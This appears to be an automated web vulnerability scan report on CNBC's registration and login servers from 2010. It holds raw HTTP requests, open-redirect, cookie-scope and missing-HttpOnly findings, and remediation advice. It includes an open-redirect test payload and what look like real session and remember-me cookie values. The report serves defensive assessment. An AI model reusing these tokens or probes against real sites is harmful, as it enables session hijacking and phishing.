GET /quote-html-webservice/fvquote.htm HTTP/1.1 Host: register.cnbc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: c_enc=g0gL3psSgYxqAAMwCf69qoF3AnP2umz1anXrD6CCmSE=; SUBSCRIBERINFO=T; SUBSCRIBERINFO2=f253efe302d32ab264a76e0ce65be769; SUBSCRIBERINFO3=unkz; JSESSIONID=698F629D8D09311DADAE187E0DFFC18F; ACEGI_SECURITY_HASHED_REMEMBER_ME_COOKIE=test@fastdial.net:dGVzdEBmYXN0ZGlhbC5uZXQ6MTI5NDE2MjgzOTQzNzo4ODlmNDBhMTA4NzJiMTZlMWJkMzA5YjI3OGJkNTMyOA==; cnbc_most_recent_quotes=OIH; cnbcStreamQuoteMasterToggleRememberSwitch=on; Axxd=1; s_sq=%5B%5BB%5D%5D; AxData=; pers_cookie_insert_cnbc.com_Prod_registration_servers_80=1640092224.20480.0000; s_cc=true; TZM=-360; s_nr=1292954620754; pers_cookie_insert_cnbc.com_Prod_registration_servers_443=1640092224.23040.0000; CASTOKEN=test@fastdial.net; USERFONTSIZE=1; __qca=P0-2146369917-1292953196619; c_ws=465842946614631C03276B09EE6F4482; c_sna=false;
Response
HTTP/1.1 404 Not Found Date: Tue, 21 Dec 2010 20:32:53 GMT Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19 Content-Length: 231 Connection: close Content-Type: text/html; charset=iso-8859-1 Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=1640092224.23040.0000; expires=Tue, 21-Dec-2010 23:32:54 GMT; path=/
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /quote-html-webservice/fvquote.htm was not found on t ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /quote-html-webservice/quote.htm HTTP/1.1 Host: register.cnbc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: c_enc=g0gL3psSgYxqAAMwCf69qoF3AnP2umz1anXrD6CCmSE=; SUBSCRIBERINFO=T; SUBSCRIBERINFO2=f253efe302d32ab264a76e0ce65be769; SUBSCRIBERINFO3=unkz; JSESSIONID=698F629D8D09311DADAE187E0DFFC18F; ACEGI_SECURITY_HASHED_REMEMBER_ME_COOKIE=test@fastdial.net:dGVzdEBmYXN0ZGlhbC5uZXQ6MTI5NDE2MjgzOTQzNzo4ODlmNDBhMTA4NzJiMTZlMWJkMzA5YjI3OGJkNTMyOA==; cnbc_most_recent_quotes=OIH; cnbcStreamQuoteMasterToggleRememberSwitch=on; Axxd=1; s_sq=%5B%5BB%5D%5D; AxData=; pers_cookie_insert_cnbc.com_Prod_registration_servers_80=1640092224.20480.0000; s_cc=true; TZM=-360; s_nr=1292954620754; pers_cookie_insert_cnbc.com_Prod_registration_servers_443=1640092224.23040.0000; CASTOKEN=test@fastdial.net; USERFONTSIZE=1; __qca=P0-2146369917-1292953196619; c_ws=465842946614631C03276B09EE6F4482; c_sna=false;
Response
HTTP/1.1 404 Not Found Date: Tue, 21 Dec 2010 20:32:53 GMT Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19 Content-Length: 229 Connection: close Content-Type: text/html; charset=iso-8859-1 Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=1640092224.23040.0000; expires=Tue, 21-Dec-2010 23:32:54 GMT; path=/
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /quote-html-webservice/quote.htm was not found on thi ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.
Issue remediation
The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.
The value of the service request parameter is used to perform an HTTP redirect. The payload http%3a//a8ee84ee91a1380c9/a%3fhttp%3a//www.cnbc.com/id/15837362 was submitted in the service parameter. This caused a redirection to the following URL:
Open redirection vulnerabilities arise when an application incorporates user-controllable data into the target of a redirection in an unsafe way. An attacker can construct a URL within the application which causes a redirection to an arbitrary external domain. This behaviour can be leveraged to facilitate phishing attacks against users of the application. The ability to use an authentic application URL, targetting the correct domain with a valid SSL certificate (if SSL is used) lends credibility to the phishing attack because many users, even if they verify these features, will not notice the subsequent redirection to a different domain.
Issue remediation
If possible, applications should avoid incorporating user-controllable data into redirection targets. In many cases, this behaviour can be avoided in two ways:
Remove the redirection function from the application, and replace links to it with direct links to the relevant target URLs.
Maintain a server-side list of all URLs that are permitted for redirection. Instead of passing the target URL as a parameter to the redirector, pass an index into this list.
If it is considered unavoidable for the redirection function to receive user-controllable input and incorporate this into the redirection target, one of the following measures should be used to minimize the risk of redirection attacks:
The application should use relative URLs in all of its redirects, and the redirection function should strictly validate that the URL received is a relative URL.
The application should use URLs relative to the web root for all of its redirects, and the redirection function should validate that the URL received starts with a slash character. It should then prepend http://yourdomainname.com to the URL before issuing the redirect.
The application should use absolute URLs for all of its redirects, and the redirection function should verify that the user-supplied URL begins with http://yourdomainname.com/ before issuing the redirect.
A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.
Issue remediation
By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.
Issue remediation
There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.
You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /cas/checkCasTicket HTTP/1.1 Host: login.cnbc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: c_enc=g0gL3psSgYxqAAMwCf69qoF3AnP2umz1anXrD6CCmSE=; SUBSCRIBERINFO=T; SUBSCRIBERINFO2=f253efe302d32ab264a76e0ce65be769; SUBSCRIBERINFO3=unkz; JSESSIONID=0BDCD955EB995F8A6B2D0E3E54C2EB94; CASTGC=TGT-521-9pmj3bXHxQh5Pt4a5pj24jFdXegFOzEgUgE-50; ACEGI_SECURITY_HASHED_REMEMBER_ME_COOKIE=test@fastdial.net:dGVzdEBmYXN0ZGlhbC5uZXQ6MTI5NDE2MjgzOTQzNzo4ODlmNDBhMTA4NzJiMTZlMWJkMzA5YjI3OGJkNTMyOA==; cnbc_most_recent_quotes=OIH; cnbcStreamQuoteMasterToggleRememberSwitch=on; CASPRIVACY=; Axxd=1; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DMember%252520Center%25257CMain%252520Menu%2526pidt%253D1%2526oid%253Dhttps%25253A//register.cnbc.com/email/EmailSupport.jsp%2526ot%253DA; AxData=; s_cc=true; s_nr=1292954620754; CASTOKEN=test@fastdial.net; USERFONTSIZE=1; __qca=P0-2146369917-1292953196619; c_ws=465842946614631C03276B09EE6F4482; c_sna=false;
Response
HTTP/1.1 200 OK Date: Tue, 21 Dec 2010 19:24:36 GMT Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19 Set-Cookie: JSESSIONID=6BF4480DEF5C01845E5BBF6731B7329D; Path=/cas Content-Language: en Content-Length: 118 Connection: close Content-Type: text/xml;charset=ISO-8859-1
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /cas/login?service=https%3A%2F%2Fregister.cnbc.com%2Fj_acegi_cas_security_check&source=header&login_view=header HTTP/1.1 Host: login.cnbc.com Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /cas/logout HTTP/1.1 Host: login.cnbc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: c_enc=g0gL3psSgYxqAAMwCf69qoF3AnP2umz1anXrD6CCmSE=; SUBSCRIBERINFO=T; SUBSCRIBERINFO2=f253efe302d32ab264a76e0ce65be769; SUBSCRIBERINFO3=unkz; JSESSIONID=5F034B0145D5B97FF8042C2DB05CA38E; CASTGC=TGT-521-9pmj3bXHxQh5Pt4a5pj24jFdXegFOzEgUgE-50; ACEGI_SECURITY_HASHED_REMEMBER_ME_COOKIE=test@fastdial.net:dGVzdEBmYXN0ZGlhbC5uZXQ6MTI5NDE2MjgzOTQzNzo4ODlmNDBhMTA4NzJiMTZlMWJkMzA5YjI3OGJkNTMyOA==; cnbc_most_recent_quotes=OIH; cnbcStreamQuoteMasterToggleRememberSwitch=on; CASPRIVACY=; Axxd=1; s_sq=%5B%5BB%5D%5D; AxData=; s_cc=true; TZM=-360; s_nr=1292954620754; CASTOKEN=test@fastdial.net; USERFONTSIZE=1; __qca=P0-2146369917-1292953196619; c_ws=465842946614631C03276B09EE6F4482; c_sna=false;
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /email/contactCustomerService.do HTTP/1.1 Host: register.cnbc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: c_enc=g0gL3psSgYxqAAMwCf69qoF3AnP2umz1anXrD6CCmSE=; SUBSCRIBERINFO=T; SUBSCRIBERINFO2=f253efe302d32ab264a76e0ce65be769; SUBSCRIBERINFO3=unkz; JSESSIONID=698F629D8D09311DADAE187E0DFFC18F; ACEGI_SECURITY_HASHED_REMEMBER_ME_COOKIE=test@fastdial.net:dGVzdEBmYXN0ZGlhbC5uZXQ6MTI5NDE2MjgzOTQzNzo4ODlmNDBhMTA4NzJiMTZlMWJkMzA5YjI3OGJkNTMyOA==; cnbc_most_recent_quotes=OIH; cnbcStreamQuoteMasterToggleRememberSwitch=on; Axxd=1; s_sq=%5B%5BB%5D%5D; AxData=; pers_cookie_insert_cnbc.com_Prod_registration_servers_80=1640092224.20480.0000; s_cc=true; TZM=-360; s_nr=1292954620754; pers_cookie_insert_cnbc.com_Prod_registration_servers_443=1640092224.23040.0000; CASTOKEN=test@fastdial.net; USERFONTSIZE=1; __qca=P0-2146369917-1292953196619; c_ws=465842946614631C03276B09EE6F4482; c_sna=false;
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /refreshlogin.jsp?source=header&service=http://www.cnbc.com/id/15837362 HTTP/1.1 Host: register.cnbc.com Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /registerUser.do HTTP/1.1 Host: register.cnbc.com Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __qca=P0-1082571395-1289590021769; TZM=-360; s_nr=1292257245769; s_cc=true; s_sq=%5B%5BB%5D%5D
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Tue, 21 Dec 2010 17:41:06 GMT Content-Type: text/html Connection: keep-alive Cache-Control: private Content-Length: 1245 Expires: Tue, 21 Dec 2010 17:01:06 GMT IISExport: This web site was exported using IIS Export v4.2 X-Powered-By: ASP.NET P3P: CP="PHY ONL UNI PUR FIN COM NAV INT DEM STA HEA CUR ADM DEV OUR IND" Set-Cookie: 1602%5F0=3603DAE9282E48DC15A921BB672899FF; path=/ Set-Cookie: 1602%5F1=YYY5%5FQcZo0zXHPE%2FK48o9IovtoQ%3D%3D; expires=Thu, 29-Aug-2024 16:41:06 GMT; path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Tue, 21 Dec 2010 17:41:06 GMT Content-Type: text/html Connection: keep-alive Cache-Control: private Content-Length: 2521 Expires: Tue, 21 Dec 2010 17:01:06 GMT IISExport: This web site was exported using IIS Export v4.2 X-Powered-By: ASP.NET P3P: CP="PHY ONL UNI PUR FIN COM NAV INT DEM STA HEA CUR ADM DEV OUR IND" Set-Cookie: 1602%5F0=7A61B4E490B96BC2E4CB71A1868D6F96; path=/ Set-Cookie: 1602%5F1=YYY5%5FXUi%2FFXE152AQWyAmAM%2BdHg%3D%3D; expires=Thu, 29-Aug-2024 16:41:06 GMT; path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>CNBC Quote Modu ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
1948%5F0=EE145EA19001573DA10C81C1F2D92ECE; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
HTTP/1.1 302 Object moved Server: nginx/0.6.39 Date: Tue, 21 Dec 2010 17:41:32 GMT Content-Type: text/html Connection: keep-alive Cache-Control: private Content-Length: 175 Expires: Tue, 21 Dec 2010 17:01:31 GMT Location: pages/create.asp?Seed=698F629D8D09311DADAE187E0DFFC18F IISExport: This web site was exported using IIS Export v4.2 X-Powered-By: ASP.NET P3P: CP="PHY ONL UNI PUR FIN COM NAV INT DEM STA HEA CUR ADM DEV OUR IND" Set-Cookie: 1948%5F0=EE145EA19001573DA10C81C1F2D92ECE; path=/
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="pages/create.asp?Seed=698F629D8D09311DADAE187E0DFFC18F">here</a>.</body>
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
HTTP/1.1 302 Object moved Server: nginx/0.6.39 Date: Tue, 21 Dec 2010 18:18:39 GMT Content-Type: text/html Connection: keep-alive Cache-Control: private Content-Length: 233 Expires: Tue, 21 Dec 2010 17:38:39 GMT Location: http://login.cnbc.com/cas/logout?service=https://login.cnbc.com/authproxy/portfolio/auth.do%3FAction%3Dportfolio IISExport: This web site was exported using IIS Export v4.2 X-Powered-By: ASP.NET Set-Cookie: Login%2EStatusString=EXPIRED%5FTIME%5FSTAMP; expires=Fri, 24-Jul-1998 04:00:00 GMT; path=/ Set-Cookie: Login%2EStatus=7995438; expires=Fri, 24-Jul-1998 04:00:00 GMT; path=/
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="http://login.cnbc.com/cas/logout?service=https://login.cnbc.com/authproxy/portfolio/auth.do%3FActi ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: register.cnbc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: c_enc=g0gL3psSgYxqAAMwCf69qoF3AnP2umz1anXrD6CCmSE=; SUBSCRIBERINFO=T; SUBSCRIBERINFO2=f253efe302d32ab264a76e0ce65be769; SUBSCRIBERINFO3=unkz; JSESSIONID=698F629D8D09311DADAE187E0DFFC18F; ACEGI_SECURITY_HASHED_REMEMBER_ME_COOKIE=test@fastdial.net:dGVzdEBmYXN0ZGlhbC5uZXQ6MTI5NDE2MjgzOTQzNzo4ODlmNDBhMTA4NzJiMTZlMWJkMzA5YjI3OGJkNTMyOA==; cnbc_most_recent_quotes=OIH; cnbcStreamQuoteMasterToggleRememberSwitch=on; Axxd=1; s_sq=%5B%5BB%5D%5D; AxData=; pers_cookie_insert_cnbc.com_Prod_registration_servers_80=1640092224.20480.0000; s_cc=true; TZM=-360; s_nr=1292954620754; pers_cookie_insert_cnbc.com_Prod_registration_servers_443=1640092224.23040.0000; CASTOKEN=test@fastdial.net; USERFONTSIZE=1; __qca=P0-2146369917-1292953196619; c_ws=465842946614631C03276B09EE6F4482; c_sna=false;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /cas HTTP/1.1 Host: register.cnbc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: c_enc=g0gL3psSgYxqAAMwCf69qoF3AnP2umz1anXrD6CCmSE=; SUBSCRIBERINFO=T; SUBSCRIBERINFO2=f253efe302d32ab264a76e0ce65be769; SUBSCRIBERINFO3=unkz; JSESSIONID=698F629D8D09311DADAE187E0DFFC18F; ACEGI_SECURITY_HASHED_REMEMBER_ME_COOKIE=test@fastdial.net:dGVzdEBmYXN0ZGlhbC5uZXQ6MTI5NDE2MjgzOTQzNzo4ODlmNDBhMTA4NzJiMTZlMWJkMzA5YjI3OGJkNTMyOA==; cnbc_most_recent_quotes=OIH; cnbcStreamQuoteMasterToggleRememberSwitch=on; Axxd=1; s_sq=%5B%5BB%5D%5D; AxData=; pers_cookie_insert_cnbc.com_Prod_registration_servers_80=1640092224.20480.0000; s_cc=true; TZM=-360; s_nr=1292954620754; pers_cookie_insert_cnbc.com_Prod_registration_servers_443=1640092224.23040.0000; CASTOKEN=test@fastdial.net; USERFONTSIZE=1; __qca=P0-2146369917-1292953196619; c_ws=465842946614631C03276B09EE6F4482; c_sna=false;
Response
HTTP/1.1 404 Not Found Date: Tue, 21 Dec 2010 20:32:53 GMT Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19 Content-Length: 201 Connection: close Content-Type: text/html; charset=iso-8859-1 Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=1640092224.23040.0000; expires=Tue, 21-Dec-2010 23:32:54 GMT; path=/
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /cas was not found on this server.</p> </body></html> ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /checkemail.do HTTP/1.1 Host: register.cnbc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: c_enc=g0gL3psSgYxqAAMwCf69qoF3AnP2umz1anXrD6CCmSE=; SUBSCRIBERINFO=T; SUBSCRIBERINFO2=f253efe302d32ab264a76e0ce65be769; SUBSCRIBERINFO3=unkz; JSESSIONID=698F629D8D09311DADAE187E0DFFC18F; ACEGI_SECURITY_HASHED_REMEMBER_ME_COOKIE=test@fastdial.net:dGVzdEBmYXN0ZGlhbC5uZXQ6MTI5NDE2MjgzOTQzNzo4ODlmNDBhMTA4NzJiMTZlMWJkMzA5YjI3OGJkNTMyOA==; cnbc_most_recent_quotes=OIH; cnbcStreamQuoteMasterToggleRememberSwitch=on; Axxd=1; s_sq=%5B%5BB%5D%5D; AxData=; pers_cookie_insert_cnbc.com_Prod_registration_servers_80=1640092224.20480.0000; s_cc=true; TZM=-360; s_nr=1292954620754; pers_cookie_insert_cnbc.com_Prod_registration_servers_443=1640092224.23040.0000; CASTOKEN=test@fastdial.net; USERFONTSIZE=1; __qca=P0-2146369917-1292953196619; c_ws=465842946614631C03276B09EE6F4482; c_sna=false;
<response> <status>FAILURE</status> <description>Email Address is required</description> <timestamp>Tue Dec 21 15:33:44 EST 2010</timestamp ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /checkpassword.do HTTP/1.1 Host: register.cnbc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: c_enc=g0gL3psSgYxqAAMwCf69qoF3AnP2umz1anXrD6CCmSE=; SUBSCRIBERINFO=T; SUBSCRIBERINFO2=f253efe302d32ab264a76e0ce65be769; SUBSCRIBERINFO3=unkz; JSESSIONID=698F629D8D09311DADAE187E0DFFC18F; ACEGI_SECURITY_HASHED_REMEMBER_ME_COOKIE=test@fastdial.net:dGVzdEBmYXN0ZGlhbC5uZXQ6MTI5NDE2MjgzOTQzNzo4ODlmNDBhMTA4NzJiMTZlMWJkMzA5YjI3OGJkNTMyOA==; cnbc_most_recent_quotes=OIH; cnbcStreamQuoteMasterToggleRememberSwitch=on; Axxd=1; s_sq=%5B%5BB%5D%5D; AxData=; pers_cookie_insert_cnbc.com_Prod_registration_servers_80=1640092224.20480.0000; s_cc=true; TZM=-360; s_nr=1292954620754; pers_cookie_insert_cnbc.com_Prod_registration_servers_443=1640092224.23040.0000; CASTOKEN=test@fastdial.net; USERFONTSIZE=1; __qca=P0-2146369917-1292953196619; c_ws=465842946614631C03276B09EE6F4482; c_sna=false;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /checkscreenname.do HTTP/1.1 Host: register.cnbc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: c_enc=g0gL3psSgYxqAAMwCf69qoF3AnP2umz1anXrD6CCmSE=; SUBSCRIBERINFO=T; SUBSCRIBERINFO2=f253efe302d32ab264a76e0ce65be769; SUBSCRIBERINFO3=unkz; JSESSIONID=698F629D8D09311DADAE187E0DFFC18F; ACEGI_SECURITY_HASHED_REMEMBER_ME_COOKIE=test@fastdial.net:dGVzdEBmYXN0ZGlhbC5uZXQ6MTI5NDE2MjgzOTQzNzo4ODlmNDBhMTA4NzJiMTZlMWJkMzA5YjI3OGJkNTMyOA==; cnbc_most_recent_quotes=OIH; cnbcStreamQuoteMasterToggleRememberSwitch=on; Axxd=1; s_sq=%5B%5BB%5D%5D; AxData=; pers_cookie_insert_cnbc.com_Prod_registration_servers_80=1640092224.20480.0000; s_cc=true; TZM=-360; s_nr=1292954620754; pers_cookie_insert_cnbc.com_Prod_registration_servers_443=1640092224.23040.0000; CASTOKEN=test@fastdial.net; USERFONTSIZE=1; __qca=P0-2146369917-1292953196619; c_ws=465842946614631C03276B09EE6F4482; c_sna=false;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /checkzipcode.do HTTP/1.1 Host: register.cnbc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: c_enc=g0gL3psSgYxqAAMwCf69qoF3AnP2umz1anXrD6CCmSE=; SUBSCRIBERINFO=T; SUBSCRIBERINFO2=f253efe302d32ab264a76e0ce65be769; SUBSCRIBERINFO3=unkz; JSESSIONID=698F629D8D09311DADAE187E0DFFC18F; ACEGI_SECURITY_HASHED_REMEMBER_ME_COOKIE=test@fastdial.net:dGVzdEBmYXN0ZGlhbC5uZXQ6MTI5NDE2MjgzOTQzNzo4ODlmNDBhMTA4NzJiMTZlMWJkMzA5YjI3OGJkNTMyOA==; cnbc_most_recent_quotes=OIH; cnbcStreamQuoteMasterToggleRememberSwitch=on; Axxd=1; s_sq=%5B%5BB%5D%5D; AxData=; pers_cookie_insert_cnbc.com_Prod_registration_servers_80=1640092224.20480.0000; s_cc=true; TZM=-360; s_nr=1292954620754; pers_cookie_insert_cnbc.com_Prod_registration_servers_443=1640092224.23040.0000; CASTOKEN=test@fastdial.net; USERFONTSIZE=1; __qca=P0-2146369917-1292953196619; c_ws=465842946614631C03276B09EE6F4482; c_sna=false;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /createUser.do HTTP/1.1 Host: register.cnbc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: c_enc=g0gL3psSgYxqAAMwCf69qoF3AnP2umz1anXrD6CCmSE=; SUBSCRIBERINFO=T; SUBSCRIBERINFO2=f253efe302d32ab264a76e0ce65be769; SUBSCRIBERINFO3=unkz; JSESSIONID=698F629D8D09311DADAE187E0DFFC18F; ACEGI_SECURITY_HASHED_REMEMBER_ME_COOKIE=test@fastdial.net:dGVzdEBmYXN0ZGlhbC5uZXQ6MTI5NDE2MjgzOTQzNzo4ODlmNDBhMTA4NzJiMTZlMWJkMzA5YjI3OGJkNTMyOA==; cnbc_most_recent_quotes=OIH; cnbcStreamQuoteMasterToggleRememberSwitch=on; Axxd=1; s_sq=%5B%5BB%5D%5D; AxData=; pers_cookie_insert_cnbc.com_Prod_registration_servers_80=1640092224.20480.0000; s_cc=true; TZM=-360; s_nr=1292954620754; pers_cookie_insert_cnbc.com_Prod_registration_servers_443=1640092224.23040.0000; CASTOKEN=test@fastdial.net; USERFONTSIZE=1; __qca=P0-2146369917-1292953196619; c_ws=465842946614631C03276B09EE6F4482; c_sna=false;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
/* Confirmation overlay whcih popsup once the user submits*/ .confMainDiv{margin:0px;padding:0px;position:absolute;z-index:200;display:none;} .confMainDiv .confirmationDiv{font-family:Arial;font-size: ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
